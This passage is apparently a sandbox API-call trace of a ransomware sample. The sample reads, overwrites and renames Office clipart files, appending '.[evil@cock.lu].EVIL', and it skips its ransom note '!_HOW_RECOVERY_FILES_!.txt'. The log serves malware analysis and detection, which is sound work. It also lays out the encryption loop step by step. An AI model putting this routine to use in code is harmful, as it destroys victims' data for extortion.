Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 0x45 [0147.069] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.071] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x29ac, lpOverlapped=0x0) returned 1 [0147.074] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.074] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.074] _errno () returned 0x84b1160840 [0147.074] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.075] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x29c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x29c0, lpOverlapped=0x0) returned 1 [0147.075] CloseHandle (hObject=0x1a8) returned 1 [0147.075] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.075] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.075] __uncaught_exception () returned 0x84b1160800 [0147.075] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.076] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf.[evil@cock.lu].evil")) returned 1 [0147.076] ??_V@YAXPEAX@Z () returned 0x1 [0147.080] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF", dwFileAttributes=0x200) returned 0 [0147.080] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.080] wcsstr (_Str="J0152894.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.080] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 69 [0147.080] wcscmp (_String1="J0152894.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.080] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152894.WMF") returned 0x0 [0147.080] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 0x45 [0147.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.083] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2c54, lpOverlapped=0x0) returned 1 [0147.086] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.086] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.086] _errno () returned 0x84b1160840 [0147.086] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.086] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2c60, lpOverlapped=0x0) returned 1 [0147.086] CloseHandle (hObject=0x1a8) returned 1 [0147.086] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.087] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.087] __uncaught_exception () returned 0x84b1160800 [0147.087] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.087] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf.[evil@cock.lu].evil")) returned 1 [0147.088] ??_V@YAXPEAX@Z () returned 0x1 [0147.091] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF", dwFileAttributes=0x200) returned 0 [0147.091] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.091] wcsstr (_Str="J0152898.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.091] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 69 [0147.091] wcscmp (_String1="J0152898.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.091] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152898.WMF") returned 0x0 [0147.092] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 0x45 [0147.092] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.093] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1190, lpOverlapped=0x0) returned 1 [0147.096] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.096] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.096] _errno () returned 0x84b1160840 [0147.096] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.096] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x11a0, lpOverlapped=0x0) returned 1 [0147.096] CloseHandle (hObject=0x1a8) returned 1 [0147.096] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.096] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.096] __uncaught_exception () returned 0x84b1160800 [0147.097] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.097] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf.[evil@cock.lu].evil")) returned 1 [0147.097] ??_V@YAXPEAX@Z () returned 0x1 [0147.100] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF", dwFileAttributes=0x200) returned 0 [0147.100] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.100] wcsstr (_Str="J0153047.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.100] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 69 [0147.100] wcscmp (_String1="J0153047.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.100] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153047.WMF") returned 0x0 [0147.100] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 0x45 [0147.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.103] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x812c, lpOverlapped=0x0) returned 1 [0147.105] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.105] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.105] _errno () returned 0x84b1160840 [0147.105] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.105] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x8140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8140, lpOverlapped=0x0) returned 1 [0147.105] CloseHandle (hObject=0x1a8) returned 1 [0147.105] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.106] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.106] __uncaught_exception () returned 0x84b1160800 [0147.106] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.106] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf.[evil@cock.lu].evil")) returned 1 [0147.107] ??_V@YAXPEAX@Z () returned 0x1 [0147.110] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF", dwFileAttributes=0x200) returned 0 [0147.110] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.110] wcsstr (_Str="J0153087.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.110] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 69 [0147.110] wcscmp (_String1="J0153087.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.110] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153087.WMF") returned 0x0 [0147.110] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 0x45 [0147.110] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.112] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x778, lpOverlapped=0x0) returned 1 [0147.116] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.116] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.116] _errno () returned 0x84b1160840 [0147.116] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.116] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x780, lpOverlapped=0x0) returned 1 [0147.116] CloseHandle (hObject=0x1a8) returned 1 [0147.116] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.117] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.117] __uncaught_exception () returned 0x84b1160800 [0147.117] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.117] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf.[evil@cock.lu].evil")) returned 1 [0147.118] ??_V@YAXPEAX@Z () returned 0x1 [0147.121] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF", dwFileAttributes=0x200) returned 0 [0147.121] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.121] wcsstr (_Str="J0153089.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.121] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 69 [0147.121] wcscmp (_String1="J0153089.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.121] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153089.WMF") returned 0x0 [0147.121] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 0x45 [0147.121] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.123] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ea8, lpOverlapped=0x0) returned 1 [0147.125] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.125] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.125] _errno () returned 0x84b1160840 [0147.125] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.125] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ec0, lpOverlapped=0x0) returned 1 [0147.126] CloseHandle (hObject=0x1a8) returned 1 [0147.126] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.126] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.126] __uncaught_exception () returned 0x84b1160800 [0147.126] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.126] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf.[evil@cock.lu].evil")) returned 1 [0147.145] ??_V@YAXPEAX@Z () returned 0x1 [0147.149] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF", dwFileAttributes=0x200) returned 0 [0147.149] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.149] wcsstr (_Str="J0153091.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.149] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 69 [0147.149] wcscmp (_String1="J0153091.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.149] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153091.WMF") returned 0x0 [0147.149] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 0x45 [0147.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.151] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1fc8, lpOverlapped=0x0) returned 1 [0147.156] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.156] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.156] _errno () returned 0x84b1160840 [0147.156] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.156] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fe0, lpOverlapped=0x0) returned 1 [0147.156] CloseHandle (hObject=0x1a8) returned 1 [0147.156] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.157] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.157] __uncaught_exception () returned 0x84b1160800 [0147.157] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.157] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf.[evil@cock.lu].evil")) returned 1 [0147.158] ??_V@YAXPEAX@Z () returned 0x1 [0147.162] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF", dwFileAttributes=0x200) returned 0 [0147.162] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.162] wcsstr (_Str="J0153093.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.162] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 69 [0147.162] wcscmp (_String1="J0153093.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.162] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153093.WMF") returned 0x0 [0147.162] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 0x45 [0147.162] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.164] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x22b0, lpOverlapped=0x0) returned 1 [0147.178] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.178] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.178] _errno () returned 0x84b1160840 [0147.178] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.178] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x22c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x22c0, lpOverlapped=0x0) returned 1 [0147.178] CloseHandle (hObject=0x1a8) returned 1 [0147.178] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.179] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.179] __uncaught_exception () returned 0x84b1160800 [0147.179] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.179] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf.[evil@cock.lu].evil")) returned 1 [0147.180] ??_V@YAXPEAX@Z () returned 0x1 [0147.182] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF", dwFileAttributes=0x200) returned 0 [0147.183] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.183] wcsstr (_Str="J0153095.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.183] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 69 [0147.183] wcscmp (_String1="J0153095.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.183] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153095.WMF") returned 0x0 [0147.183] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 0x45 [0147.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.185] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, 